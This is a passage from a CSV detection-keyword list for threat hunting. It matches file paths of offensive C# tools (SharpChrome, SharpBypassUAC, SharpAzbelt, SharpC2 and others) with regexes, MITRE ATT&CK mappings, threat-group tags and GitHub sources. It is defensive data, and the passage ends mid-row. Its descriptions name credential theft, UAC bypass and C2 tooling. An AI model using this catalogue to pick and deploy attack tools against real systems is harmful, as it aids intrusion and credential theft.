"*\SharpADWS.sln*",".{0,1000}\\SharpADWS\.sln.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18427" 
"*\SharpADWS\*",".{0,1000}\\SharpADWS\\.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18428" "*\SharpADWS-master*",".{0,1000}\\SharpADWS\-master.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18429" "*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18430" "*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18431" "*\SharpAltSecIds.exe*",".{0,1000}\\SharpAltSecIds\.exe.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18432" "*\SharpAltSecIds.sln*",".{0,1000}\\SharpAltSecIds\.sln.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18433" "*\SharpAltSecIds-master*",".{0,1000}\\SharpAltSecIds\-master.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","18434" "*\SharpAppLocker.*",".{0,1000}\\SharpAppLocker\..{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","18435" "*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18436" "*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18437" "*\SharpAVKB.exe*",".{0,1000}\\SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18438" "*\SharpAVKB.exe*",".{0,1000}\\SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18439" "*\SharpAVKB.pdb*",".{0,1000}\\SharpAVKB\.pdb.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - 
T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18440" "*\SharpAVKB-master*",".{0,1000}\\SharpAVKB\-master.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","18441" "*\SharpAzbelt.csproj*",".{0,1000}\\SharpAzbelt\.csproj.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18442" "*\SharpAzbelt.exe*",".{0,1000}\\SharpAzbelt\.exe.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18443" "*\SharpAzbelt.sln*",".{0,1000}\\SharpAzbelt\.sln.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","18444" "*\SharpBlock.exe*",".{0,1000}\\SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18445" "*\SharpBruteForceSSH-main*","\\SharpBruteForceSSH\-main","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","18446" "*\SharpBuster.csproj*",".{0,1000}\\SharpBuster\.csproj.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18447" 
"*\SharpBuster.dll*",".{0,1000}\\SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18448" "*\SharpBuster.exe*",".{0,1000}\\SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18449" "*\SharpBuster.pdb*",".{0,1000}\\SharpBuster\.pdb.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18450" "*\SharpBuster.sln*",".{0,1000}\\SharpBuster\.sln.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18451" "*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - 
T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18452" "*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18453" "*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18454" "*\SharpC2*",".{0,1000}\\SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","18455" "*\SharpChassisType.exe*",".{0,1000}\\SharpChassisType\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18456" "*\SharpCheckInfo.exe*",".{0,1000}\\SharpCheckInfo\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 
- T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18457" "*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18458" "*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18459" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18460" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18461" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - 
T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18462" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18463" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18464" "*\SharpChrome.pdb*",".{0,1000}\\SharpChrome\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - 
T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18465" "*\SharpChrome.pdb*",".{0,1000}\\SharpChrome\.pdb.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18466" "*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18467" "*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18468" "*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18469" "*\SharpChromium\*",".{0,1000}\\SharpChromium\\.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","0","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","18470" "*\SharpClipboard.csproj*",".{0,1000}\\SharpClipboard\.csproj.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18471" "*\SharpClipboard.sln*",".{0,1000}\\SharpClipboard\.sln.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential 
Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18472" "*\SharpClipboard\*",".{0,1000}\\SharpClipboard\\.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18473" "*\SharpClipHistory.exe*",".{0,1000}\\SharpClipHistory\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18474" "*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18475" 
"*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18476" "*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - 